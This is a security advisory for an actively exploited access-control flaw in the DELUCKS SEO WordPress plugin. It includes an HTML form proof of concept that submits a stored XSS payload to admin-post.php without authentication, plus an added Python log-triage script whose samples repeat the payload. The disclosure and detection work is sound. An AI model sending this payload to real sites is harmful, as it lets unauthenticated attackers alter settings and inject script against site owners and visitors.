#VU21333 Improper access control in DELUCKS SEO 

 


Published: September 25, 2019


Vulnerability identifier: #VU21333
Vulnerability risk: High
CVSSv4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:A/U:Amber
CVE-ID: N/A
CWE-ID: CWE-284
Exploitation vector: Remote access
Exploit availability: The vulnerability is being exploited in the wild
Vulnerable software:
DELUCKS SEO
Software vendor:
DELUCKS GmbH

Description

The vulnerability allows a remote attacker to gain unauthorized access to otherwise restricted functionality.

The vulnerability exists due to improper access restrictions in the "saveSettings()" function when processing data passed to the "/wp-admin/admin-post.php" URL. A remote unauthenticated attacker can bypass the implemented security restrictions and execute arbitrary JavaScript code on the website.

Note: this vulnerability is being actively exploited in the wild.

PoC:

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="dpc_save_settings" />
<input type="hidden" name="dpc[basic_metadata][dpc_status_basic_metadata]" value="1" />
<input type="hidden" name="dpc[basic_metadata][en][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][desc]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][post][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][posttypes][page][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][profiles][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][archives][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][tags][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][frontpage]" value="" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][delimiter]" value="-" />
<input type="hidden" name="dpc[basic_metadata][en][searchresults][title][website]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][google]" value='"><script>alert("XSS");</script>' />
<input type="hidden" name="dpc[basic_metadata][verify][bing]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][yandex]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][baidu]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][pinterest]" value="" />
<input type="hidden" name="dpc[basic_metadata][verify][alexa]" value="" />
<input type="hidden" name="dpc[basic_metadata][follow_texonomies]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_texonomies]" value="index" />
<input type="hidden" name="dpc[basic_metadata][follow_paginated]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][index_paginated]" value="index" />
<input type="hidden" name="dpc[basic_metadata][categories][1][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][categories][1][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][profiles][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][profiles][index]" value="index" />
<input type="hidden" name="dpc[basic_metadata][attachments][follow]" value="follow" />
<input type="hidden" name="dpc[basic_metadata][attachments][index]" value="index" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Remediation

Cybersecurity Help is currently unaware of any official solution to address this vulnerability.
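
With no official fix available, request logs can be triaged for the pattern shown in the PoC. The following is an added example, not part of the original advisory or the vendor's code; it assumes a proxy or WAF log that records the request body and Cookie header, and the record layout, the inspect() function and the sample records are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

ENDPOINT = "/wp-admin/admin-post.php"  # URL named in the advisory
TRIGGER = "dpc_save_settings"          # field name taken from the PoC form
AUTH_COOKIE = "wordpress_logged_in_"   # prefix of the WordPress login cookie
MARKUP = re.compile(r"[<>]")           # heuristic: tag delimiters in a settings value


def inspect(request):
    """Return findings for one logged request (dict: method, url, cookie, body)."""
    path = urlsplit(request["url"]).path
    if request["method"] != "POST" or not path.endswith(ENDPOINT):
        return []
    fields = parse_qsl(request["body"], keep_blank_values=True)
    if not any(name == TRIGGER for name, _ in fields):
        return []  # some other admin-post.php action, not the plugin's settings save
    findings = []
    # Cookie presence is only a triage signal; it does not prove a valid session.
    if AUTH_COOKIE not in request.get("cookie", ""):
        findings.append("settings save without a WordPress login cookie")
    for name, value in fields:
        if name.startswith("dpc[") and MARKUP.search(value):
            findings.append(f"markup in {name}: {value!r}")
    return findings


# Constructed sample records (not real traffic).
SAMPLES = [
    {"method": "POST", "url": "/wp-admin/admin-post.php", "cookie": "",
     "body": urlencode({TRIGGER: "",
                        "dpc[basic_metadata][verify][google]":
                            '"><script>alert("XSS");</script>'})},
    {"method": "POST", "url": "/blog/wp-admin/admin-post.php",
     "cookie": "wordpress_logged_in_constructed=admin",
     "body": urlencode({TRIGGER: "",
                        "dpc[basic_metadata][en][title][delimiter]": "-"})},
    {"method": "POST", "url": "/wp-admin/admin-post.php", "cookie": "",
     "body": urlencode({"action": "contact", "msg": "<b>hi</b>"})},
]

if __name__ == "__main__":
    for number, sample in enumerate(SAMPLES, 1):
        print(number, inspect(sample) or "clean")
```

A hit on the first finding alone already matches the advisory's unauthenticated settings change; the markup check narrows it to saves that carry script or tag content.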

External links